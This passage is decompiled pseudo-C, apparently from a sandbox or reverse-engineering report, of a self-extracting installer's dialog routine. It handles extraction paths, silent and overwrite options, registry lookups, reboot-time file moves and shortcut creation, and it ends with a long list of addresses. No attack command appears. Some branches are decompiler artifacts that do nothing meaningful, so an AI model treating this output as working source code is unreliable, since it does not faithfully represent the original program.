										} else {
											_t283 = _t277;
											_push(_t277);
											goto L22;
											L22:
											E00263E41(_t285 - 0x103c, 0x800, L"%s.%d.tmp", _t285 - 0x3c84);
											_t287 = _t287 + 0x14;
											_t238 = GetFileAttributesW(_t285 - 0x103c);
											__eflags = _t238 - 0xffffffff;
											if(_t238 != 0xffffffff) {
												_t283 = _t283 + 1;
												__eflags = _t283;
												_push(_t283);
												goto L22;
											} else {
												_t241 = MoveFileW(_t285 - 0x3c84, _t285 - 0x103c);
												__eflags = _t241;
												if(_t241 != 0) {
													MoveFileExW(_t285 - 0x103c, _t277, 4);
												}
												goto L25;
											}
										}
									}
								case 1:
									L27:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax =  *0x2bce0c;
										__eflags =  *0x2bce0c;
										__ebx = __ebx & 0xffffff00 |  *0x2bce0c == 0x00000000;
										__eflags = __bl;
										if(__bl == 0) {
											__eax =  *0x2bce0c;
											_pop(__ecx);
											_pop(__ecx);
										}
										L30:
										__bh =  *((intOrPtr*)(__ebp - 0xd));
										__eflags = __bh;
										if(__eflags == 0) {
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__esi = E0027A2AE(__ecx, __edx, __eflags);
											__eax =  *0x2bce0c;
										} else {
											__esi = __ebp - 0x5c84;
										}
										__eflags = __bl;
										if(__bl == 0) {
											__edi = __eax;
										}
										L35:
										__eax = E00282B33(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0x2bce0c);
										__eax = E00282B5E(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											 *0x2bce0c = __eax;
											__eflags = __bl;
											if(__bl != 0) {
												__ecx = 0;
												__eflags = 0;
												 *__eax = __cx;
											}
											__eax = E002866ED(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L00282B4E(__esi);
										}
									}
									goto L164;
								case 2:
									L41:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
									}
									goto L164;
								case 3:
									L43:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L164;
									}
									L44:
									__eflags =  *0x2a9602 - __di;
									if( *0x2a9602 != __di) {
										goto L164;
									}
									L45:
									__eax = 0;
									__edi = __ebp - 0x5c84;
									_push(0x22);
									 *(__ebp - 0x103c) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x5c84) - __ax;
									if( *(__ebp - 0x5c84) == __ax) {
										__edi = __ebp - 0x5c82;
									}
									__eax = E00282B33(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L164;
									} else {
										L48:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L52:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L64:
												__ebp - 0x103c = E0026FAB1(__ebp - 0x103c, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L65:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x103c;
												__eax = E00280D9B(__ebp - 0x103c, __ebp - 0x103c);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
													if( *((intOrPtr*)(__eax + 2)) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x103c;
												__edi = 0x2a9602;
												E0026FAB1(0x2a9602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
												__eax = E00279FFC(__ebp - 0x103c, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
												__ebx =  *0x29df7c;
												__eax = SendMessageW(__esi, 0x143, __ebx, 0x2a9602); // executed
												__eax = __ebp - 0x103c;
												__eax = E00282B69(__ebp - 0x103c, 0x2a9602, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x103c = 0;
													__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
												}
												goto L164;
											}
											L53:
											__eflags = __ax;
											if(__ax == 0) {
												L55:
												__eax = __ebp - 0x18;
												__ebx = 0;
												_push(__ebp - 0x18);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0x29dea8();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x103c;
													_push(__ebp - 0x103c);
													__eax = __ebp - 0x1c;
													_push(__ebp - 0x1c);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x18));
													__eax =  *0x29dea4();
													_push( *(__ebp - 0x18));
													 *0x29de84() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *((short*)(__ebp + __eax * 2 - 0x103c)) = __cx;
												}
												__eflags =  *(__ebp - 0x103c) - __bx;
												if( *(__ebp - 0x103c) != __bx) {
													__eax = __ebp - 0x103c;
													__eax = E00282B33(__ebp - 0x103c);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x103c = E0026FA89(__eflags, __ebp - 0x103c, "\\", __esi);
													}
												}
												__esi = E00282B33(__edi);
												__eax = __ebp - 0x103c;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x103c = E0026FA89(__eflags, __ebp - 0x103c, __edi, 0x800);
												}
												goto L65;
											}
											L54:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L64;
											}
											goto L55;
										}
										L49:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L52;
										}
										L50:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L164;
										}
										L51:
										__ebp - 0x103c = E0026FAB1(__ebp - 0x103c, __edi, 0x800);
										goto L65;
									}
								case 4:
									L70:
									__eflags =  *0x2a95fc - 1;
									__eflags = __eax - 0x2a95fc;
									 *__edi =  *__edi + __ecx;
									__eflags =  *(__ebx + 6) & __bl;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L75:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L82:
										 *0x2a75d2 = __cl;
										 *0x2a75d3 = 1;
										goto L164;
									}
									L76:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0x2a75d2 = __cl;
										L81:
										 *0x2a75d3 = __cl;
										goto L164;
									}
									L77:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L82;
									}
									L78:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L164;
									}
									L79:
									 *0x2a75d2 = 1;
									goto L81;
								case 6:
									L88:
									__eflags = __ebx - 4;
									if(__ebx != 4) {
										goto L92;
									}
									L89:
									__eax = __ebp - 0x5c84;
									__eax = E00282B69(__ebp - 0x5c84, __eax, L"<>");
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										goto L92;
									}
									L90:
									_push(__edi);
									goto L91;
								case 7:
									goto L0;
								case 8:
									L116:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x5c84) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x5c84;
											_push(__ebp - 0x5c84);
											__eax = E0028668C(__ebx, __edi);
											_pop(__ecx);
											 *0x2bde1c = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0x2bde18 = E0027A2AE(__ecx, __edx, __eflags);
									}
									 *0x2b5d03 = 1;
									goto L164;
								case 9:
									L121:
									__eflags = __ebx - 5;
									if(__ebx != 5) {
										L92:
										 *0x2bde20 = 1;
										goto L164;
									}
									L122:
									_push(1);
									L91:
									__eax = __ebp - 0x5c84;
									_push(__ebp - 0x5c84);
									_push( *(__ebp + 8));
									__eax = E0027C431();
									goto L92;
								case 0xa:
									L123:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L164;
									}
									L124:
									__eax = 0;
									 *(__ebp - 0x2c3c) = __ax;
									__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
									__eax = E002859C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0x2bad0a);
										__eax = __ebp - 0x2c3c;
										_push(__ebp - 0x2c3c);
										__eax = E0026FAB1();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x2c3c;
										if(__eflags == 0) {
											_push(0x2b9d0a);
											_push(__eax);
											__eax = E0026FAB1();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0x2bbd0a);
											_push(__eax);
											__eax = E0026FAB1();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9c8c) = __ax;
									 *(__ebp - 0x1c3c) = __ax;
									__ebp - 0x19c8c = __ebp - 0x6c84;
									__eax = E00284D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
									_pop(__ecx);
									_pop(__ecx);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) != __bx) {
										L132:
										__ebp - 0x6c84 = E00269E6B(__ebp - 0x6c84);
										__eflags = __al;
										if(__al != 0) {
											goto L149;
										}
										L133:
										__ebx = __edi;
										__esi = __ebp - 0x6c84;
										__eflags =  *(__ebp - 0x6c84) - __bx;
										if( *(__ebp - 0x6c84) == __bx) {
											goto L149;
										}
										L134:
										_push(0x20);
										_pop(__ecx);
										do {
											L135:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L137:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6c84 = E00269E6B(__ebp - 0x6c84);
												__eflags = __al;
												if(__al == 0) {
													L144:
													__esi->i = __di;
													L145:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L146;
												}
												L138:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
												if(__di != __ax) {
													L140:
													_push(0x20);
													_pop(__eax);
													do {
														L141:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(__esi);
													__eax = __ebp - 0x1c3c;
													L143:
													_push(__eax);
													__eax = E00284D7E();
													_pop(__ecx);
													_pop(__ecx);
													 *__ebx = __di;
													goto L145;
												}
												L139:
												 *(__ebp - 0x1c3c) = __ax;
												__eax =  &(__esi->i);
												_push( &(__esi->i));
												__eax = __ebp - 0x1c3a;
												goto L143;
											}
											L136:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L146;
											}
											goto L137;
											L146:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											__eflags = 0;
											 *__ebx = __ax;
										}
										goto L149;
									} else {
										L130:
										__ebp - 0x19c8a = __ebp - 0x6c84;
										E00284D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
										_push(__ebx);
										_push(__ebp - 0x6c82);
										__eax = E00280BB8(__ecx);
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x1c3c = E00284D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
											_pop(__ecx);
											_pop(__ecx);
										}
										L149:
										__eflags =  *(__ebp - 0x11c8c);
										__ebx = 0x800;
										if( *(__ebp - 0x11c8c) != 0) {
											_push(0x800);
											__eax = __ebp - 0x9c8c;
											_push(__ebp - 0x9c8c);
											__eax = __ebp - 0x11c8c;
											_push(__ebp - 0x11c8c);
											__eax = E0026AED7();
										}
										_push(__ebx);
										__eax = __ebp - 0xbc8c;
										_push(__ebp - 0xbc8c);
										__eax = __ebp - 0x6c84;
										_push(__ebp - 0x6c84);
										__eax = E0026AED7();
										__eflags =  *(__ebp - 0x2c3c);
										if(__eflags == 0) {
											__ebp - 0x2c3c = E0027A24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
										}
										__ebp - 0x2c3c = E0026AEA5(__eflags, __ebp - 0x2c3c, __ebx);
										__eflags =  *((short*)(__ebp - 0x17c8c));
										if(__eflags != 0) {
											__ebp - 0x17c8c = __ebp - 0x2c3c;
											E0026FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
											__eax = E0026AEA5(__eflags, __ebp - 0x2c3c, __ebx);
										}
										__ebp - 0x2c3c = __ebp - 0xcc8c;
										__eax = E00284D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
										__eflags =  *(__ebp - 0x13c8c);
										__eax = __ebp - 0x13c8c;
										_pop(__ecx);
										_pop(__ecx);
										if(__eflags == 0) {
											__eax = __ebp - 0x19c8c;
										}
										__ebp - 0x2c3c = E0026FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
										__eax = __ebp - 0x2c3c;
										__eflags = E0026B153(__ebp - 0x2c3c);
										if(__eflags == 0) {
											L159:
											__ebp - 0x2c3c = E0026FA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
											goto L160;
										} else {
											L158:
											__eflags = __eax;
											if(__eflags == 0) {
												L160:
												_push(1);
												__eax = __ebp - 0x2c3c;
												_push(__ebp - 0x2c3c);
												E00269D3A(__ecx, __ebp) = __ebp - 0xbc8c;
												__ebp - 0xac8c = E00284D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
												_pop(__ecx);
												_pop(__ecx);
												__ebp - 0xac8c = E0026B98D(__eflags, __ebp - 0xac8c);
												__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
												__eax = __ebp - 0x1c3c;
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
												__edx = __ebp - 0x9c8c;
												__esi = __ebp - 0xac8c;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
												 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
												 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
												__eax = __ebp - 0x15c8c;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
												E00279D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
												__ebp - 0xbc8c = E00279450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
												__eflags =  *(__ebp - 0xcc8c);
												if( *(__ebp - 0xcc8c) != 0) {
													_push(__edi);
													__eax = __ebp - 0xcc8c;
													_push(__ebp - 0xcc8c);
													_push(5);
													_push(0x1000);
													__eax =  *0x29def8();
												}
												goto L164;
											}
											goto L159;
										}
									}
								case 0xb:
									L162:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0x2a9600 = 1;
									}
									goto L164;
								case 0xc:
									L83:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eax = E002859C0( *(__ebp - 0x5c84) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0x2a75d4 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0x2a75d5 = 1;
										} else {
											__eax = 0;
											 *0x2a75d4 = __al;
											 *0x2a75d5 = __al;
										}
									}
									goto L164;
								case 0xd:
									L93:
									 *0x2bde21 = 1;
									__eax = __eax + 0x2bde21;
									_t104 = __esi + 0x39;
									 *_t104 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t104;
									__ebp = 0xffffa37c;
									if( *_t104 != 0) {
										_t106 = __ebp - 0x5c84; // 0xffff46f8
										__eax = _t106;
										_push(_t106);
										 *0x29d5fc = E002713FC();
									}
									goto L164;
							}
							L2:
							_t210 = E00279E24(_t210, _t279);
							_t279 = _t279 + 0x2000;
							_t277 = _t277 - 1;
							if(_t277 != 0) {
								goto L2;
							} else {
								_t280 = _t277;
								goto L4;
							}
						}
						L165:
						 *[fs:0x0] =  *((intOrPtr*)(_t285 - 0xc));
						return _t209;
					}
					L100:
					__eflags =  *0x2b5d02;
					if( *0x2b5d02 != 0) {
						goto L164;
					}
					L101:
					__eax = 0;
					 *(__ebp - 0x143c) = __ax;
					__eax = __ebp - 0x5c84;
					_push(__ebp - 0x5c84);
					__eax = E00280BB8(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L108:
						__eflags =  *(__ebp - 0x143c);
						if( *(__ebp - 0x143c) == 0) {
							__ebp - 0x1bc8c = __ebp - 0x5c84;
							E0026FAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
							__ebp - 0x143c = E0026FAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
						}
						__ebp - 0x5c84 = E00279C4F(__ebp - 0x5c84);
						__eax = 0;
						 *(__ebp - 0x4c84) = __ax;
						__ebp - 0x143c = __ebp - 0x5c84;
						__eax = E00279735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
						__eflags = __eax - 6;
						if(__eax == 6) {
							goto L164;
						} else {
							L111:
							__eax = 0;
							__eflags = 0;
							 *0x2a75d7 = 1;
							 *0x2a85fa = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
							goto L112;
						}
					}
					L102:
					__esi = 0;
					__eflags =  *(__ebp - 0x5c84) - __dx;
					if( *(__ebp - 0x5c84) == __dx) {
						goto L108;
					}
					L103:
					__ecx = 0;
					__eax = __ebp - 0x5c84;
					while(1) {
						L104:
						__eflags =  *__eax - 0x40;
						if( *__eax == 0x40) {
							break;
						}
						L105:
						__esi =  &(__esi->i);
						__eax = __ebp - 0x5c84;
						__ecx = __esi + __esi;
						__eax = __ebp - 0x5c84 + __ecx;
						__eflags =  *__eax - __dx;
						if( *__eax != __dx) {
							continue;
						}
						L106:
						goto L108;
					}
					L107:
					__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
					__ebp - 0x143c = E0026FAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x5c84) = __ax;
					goto L108;
					L112:
					__eflags = _t263 - 7;
					if(_t263 == 7) {
						__eflags =  *0x2a95fc;
						if( *0x2a95fc == 0) {
							 *0x2a95fc = 2;
						}
						 *0x2a85f8 = 1;
					}
					goto L164;
				}
			}

0x0027bb5b
0x0027bb5b
0x0027bb5b
0x0027bb5b
0x0027bb5e
0x00000000
0x00000000
0x0027bb64
0x0027bb64
0x0027bb6a
0x0027bb78
0x0027bb84
0x0027bb86
0x0027bb88
0x0027bb8d
0x0027bb8d
0x0027bb8d
0x0027bba5
0x0027bbb2
0x0027bbb7
0x0027bbb9
0x00000000
0x00000000
0x0027bb8b
0x0027bb8b
0x0027bb8b
0x0027bb8c
0x0027bb8c
0x0027bbbb
0x0027bbc5
0x0027bbcb
0x0027bbd3
0x0027c093
0x0027c093
0x0027c093
0x0027c098
0x0027c09c
0x0027c0a0
0x0027c0a7
0x0027c0ae
0x0027c0b1
0x0027c0b6
0x0027c0b9
0x0027c0be
0x0027b51d
0x0027b523
0x0027b529
0x0027b529
0x00000000
0x00000000
0x00000000
0x00000000
0x0027b53e
0x0027b555
0x0027b559
0x00000000
0x0027b55b
0x00000000
0x0027b55b
0x0027b559
0x0027b560
0x0027b563
0x00000000
0x00000000
0x0027b569
0x0027b569
0x00000000
0x0027b570
0x0027b570
0x0027b573
0x00000000
0x00000000
0x0027b579
0x0027b579
0x0027b586
0x0027b5ac
0x0027b5b7
0x0027b5c1
0x0027b5cc
0x0027b5d1
0x0027b5d9
0x0027b5df
0x0027b5e4
0x0027b5e6
0x0027b74b
0x0027b74b
0x0027b755
0x00000000
0x0027b5ec
0x0027b5f2
0x0027b614
0x0027b623
0x0027b630
0x0027b641
0x0027b644
0x0027b647
0x0027b65a
0x0027b661
0x0027b666
0x0027b668
0x00000000
0x00000000
0x0027b66e
0x0027b675
0x0027b67a
0x0027b67f
0x0027b68b
0x0027b690
0x0027b693
0x0027b69a
0x0027b69c
0x0027b69d
0x0027b6a7
0x0027b6ad
0x0027b6ae
0x00000000
0x0027b6ae
0x0027b649
0x0027b650
0x0027b656
0x0027b658
0x00000000
0x00000000
0x00000000
0x0027b6b4
0x0027b6bb
0x0027b6bd
0x0027b6c0
0x0027b730
0x0027b730
0x0027b738
0x0027b73e
0x0027b743
0x0027b745
0x0027b5f4
0x0027b5f9
0x0027b601
0x0027b607
0x0027b60e
0x00000000
0x00000000
0x00000000
0x0027b60e
0x00000000
0x0027b745
0x0027b6c2
0x0027b6c9
0x0027b6cf
0x0027b6d1
0x00000000
0x0027b6d3
0x0027b6d3
0x0027b6d5
0x0027b6d6
0x0027b6da
0x0027b6f2
0x0027b6f7
0x0027b701
0x0027b703
0x0027b706
0x0027b6d8
0x0027b6d8
0x0027b6d9
0x00000000
0x0027b708
0x0027b716
0x0027b71c
0x0027b71e
0x0027b72a
0x0027b72a
0x00000000
0x0027b71e
0x0027b706
0x0027b6d1
0x00000000
0x0027b75f
0x0027b75f
0x0027b761
0x0027b767
0x0027b76c
0x0027b76e
0x0027b771
0x0027b773
0x0027b780
0x0027b785
0x0027b786
0x0027b786
0x0027b787
0x0027b787
0x0027b78a
0x0027b78c
0x0027b796
0x0027b799
0x0027b79f
0x0027b7a1
0x0027b78e
0x0027b78e
0x0027b78e
0x0027b7a6
0x0027b7a8
0x0027b7b1
0x0027b7b1
0x0027b7b3
0x0027b7b4
0x0027b7b9
0x0027b7c2
0x0027b7c3
0x0027b7c9
0x0027b7ce
0x0027b7d1
0x0027b7d3
0x0027b7d5
0x0027b7da
0x0027b7dc
0x0027b7de
0x0027b7de
0x0027b7e0
0x0027b7e0
0x0027b7e5
0x0027b7ea
0x0027b7eb
0x0027b7eb
0x0027b7ec
0x0027b7ee
0x0027b7f5
0x0027b7fa
0x0027b7ee
0x00000000
0x00000000
0x0027b800
0x0027b800
0x0027b802
0x0027b812
0x0027b812
0x00000000
0x00000000
0x0027b81d
0x0027b81d
0x0027b81f
0x00000000
0x00000000
0x0027b825
0x0027b825
0x0027b82c
0x00000000
0x00000000
0x0027b832
0x0027b832
0x0027b834
0x0027b83a
0x0027b83c
0x0027b843
0x0027b844
0x0027b84b
0x0027b84d
0x0027b84d
0x0027b854
0x0027b859
0x0027b85f
0x0027b861
0x00000000
0x0027b867
0x0027b867
0x0027b867
0x0027b86a
0x0027b86c
0x0027b86d
0x0027b870
0x0027b899
0x0027b899
0x0027b89c
0x0027b981
0x0027b98a
0x0027b98f
0x0027b98f
0x0027b991
0x0027b991
0x0027b993
0x0027b995
0x0027b99c
0x0027b9a1
0x0027b9a2
0x0027b9a3
0x0027b9a5
0x0027b9a7
0x0027b9ab
0x0027b9ad
0x0027b9ad
0x0027b9af
0x0027b9af
0x0027b9ab
0x0027b9b3
0x0027b9b9
0x0027b9c6
0x0027b9cd
0x0027b9dd
0x0027b9e7
0x0027b9ef
0x0027b9fb
0x0027b9fd
0x0027ba05
0x0027ba0a
0x0027ba0b
0x0027ba0c
0x0027ba0e
0x0027ba1b
0x0027ba24
0x0027ba24
0x00000000
0x0027ba0e
0x0027b8a2
0x0027b8a2
0x0027b8a5
0x0027b8b2
0x0027b8b2
0x0027b8b5
0x0027b8b7
0x0027b8b8
0x0027b8ba
0x0027b8bb
0x0027b8c0
0x0027b8c5
0x0027b8cb
0x0027b8cd
0x0027b8cf
0x0027b8d2
0x0027b8d9
0x0027b8da
0x0027b8e0
0x0027b8e1
0x0027b8e4
0x0027b8e5
0x0027b8e6
0x0027b8eb
0x0027b8ee
0x0027b8f4
0x0027b8fd
0x0027b900
0x0027b905
0x0027b907
0x0027b909
0x0027b90b
0x0027b90b
0x0027b90d
0x0027b90d
0x0027b90f
0x0027b90f
0x0027b917
0x0027b91e
0x0027b920
0x0027b927
0x0027b92d
0x0027b92f
0x0027b930
0x0027b938
0x0027b947
0x0027b947
0x0027b938
0x0027b952
0x0027b954
0x0027b963
0x0027b969
0x0027b96f
0x0027b97a
0x0027b97a
0x00000000
0x0027b96f
0x0027b8a7
0x0027b8a7
0x0027b8ac
0x00000000
0x00000000
0x00000000
0x0027b8ac
0x0027b872
0x0027b872
0x0027b876
0x00000000
0x00000000
0x0027b878
0x0027b878
0x0027b87b
0x0027b87d
0x0027b880
0x00000000
0x00000000
0x0027b886
0x0027b88f
0x00000000
0x0027b88f
0x00000000
0x0027ba2b
0x0027ba2b
0x0027ba2c
0x0027ba31
0x0027ba33
0x0027ba36
0x0027ba36
0x00000000
0x0027ba6c
0x0027ba6c
0x0027ba73
0x0027ba75
0x0027ba75
0x0027ba77
0x0027baa6
0x0027baa6
0x0027baac
0x00000000
0x0027baac
0x0027ba79
0x0027ba79
0x0027ba79
0x0027ba7c
0x0027ba95
0x0027ba95
0x0027ba9b
0x0027ba9b
0x00000000
0x0027ba9b
0x0027ba7e
0x0027ba7e
0x0027ba7e
0x0027ba81
0x00000000
0x00000000
0x0027ba83
0x0027ba83
0x0027ba83
0x0027ba86
0x00000000
0x00000000
0x0027ba8c
0x0027ba8c
0x00000000
0x00000000
0x0027baf9
0x0027baf9
0x0027bafc
0x00000000
0x00000000
0x0027bafe
0x0027bafe
0x0027bb0a
0x0027bb0f
0x0027bb10
0x0027bb11
0x0027bb13
0x00000000
0x00000000
0x0027bb15
0x0027bb15
0x00000000
0x00000000
0x00000000
0x00000000
0x0027bd07
0x0027bd07
0x0027bd0a
0x0027bd0c
0x0027bd13
0x0027bd15
0x0027bd1b
0x0027bd1c
0x0027bd21
0x0027bd22
0x0027bd22
0x0027bd27
0x0027bd2a
0x0027bd30
0x0027bd30
0x0027bd35
0x00000000
0x00000000
0x0027bd41
0x0027bd41
0x0027bd44
0x0027bb25
0x0027bb25
0x00000000
0x0027bb25
0x0027bd4a
0x0027bd4a
0x0027bb16
0x0027bb16
0x0027bb1c
0x0027bb1d
0x0027bb20
0x00000000
0x00000000
0x0027bd51
0x0027bd51
0x0027bd54
0x00000000
0x00000000
0x0027bd5a
0x0027bd5a
0x0027bd5c
0x0027bd63
0x0027bd6b
0x0027bd71
0x0027bd76
0x0027bd79
0x0027bdae
0x0027bdb3
0x0027bdb9
0x0027bdba
0x0027bdbf
0x0027bd7b
0x0027bd7b
0x0027bd7e
0x0027bd84
0x0027bd9a
0x0027bd9f
0x0027bda0
0x0027bda5
0x0027bd86
0x0027bd86
0x0027bd8b
0x0027bd8c
0x0027bd91
0x0027bd91
0x0027bd84
0x0027bdc6
0x0027bdc8
0x0027bdcf
0x0027bddd
0x0027bde4
0x0027bde9
0x0027bdea
0x0027bdeb
0x0027bded
0x0027bdee
0x0027bdf5
0x0027be3e
0x0027be45
0x0027be4a
0x0027be4c
0x00000000
0x00000000
0x0027be52
0x0027be52
0x0027be54
0x0027be5a
0x0027be61
0x00000000
0x00000000
0x0027be63
0x0027be63
0x0027be65
0x0027be66
0x0027be66
0x0027be66
0x0027be69
0x0027be6c
0x0027be76
0x0027be76
0x0027be78
0x0027be7a
0x0027be84
0x0027be89
0x0027be8b
0x0027bec9
0x0027bec9
0x0027becc
0x0027becc
0x0027bece
0x0027becf
0x0027becf
0x00000000
0x0027becf
0x0027be8d
0x0027be8d
0x0027be8f
0x0027be90
0x0027be92
0x0027be95
0x0027beaa
0x0027beaa
0x0027beac
0x0027bead
0x0027bead
0x0027bead
0x0027beb0
0x0027beb0
0x0027beb5
0x0027beb6
0x0027bebc
0x0027bebc
0x0027bebd
0x0027bec2
0x0027bec3
0x0027bec4
0x00000000
0x0027bec4
0x0027be97
0x0027be97
0x0027be9e
0x0027bea1
0x0027bea2
0x00000000
0x0027bea2
0x0027be6e
0x0027be6e
0x0027be70
0x0027be71
0x0027be74
0x00000000
0x00000000
0x00000000
0x0027bed1
0x0027bed1
0x0027bed4
0x0027bed4
0x0027bed9
0x0027bedb
0x0027bedd
0x0027bedd
0x0027bedf
0x0027bedf
0x00000000
0x0027bdf7
0x0027bdf7
0x0027bdfe
0x0027be0a
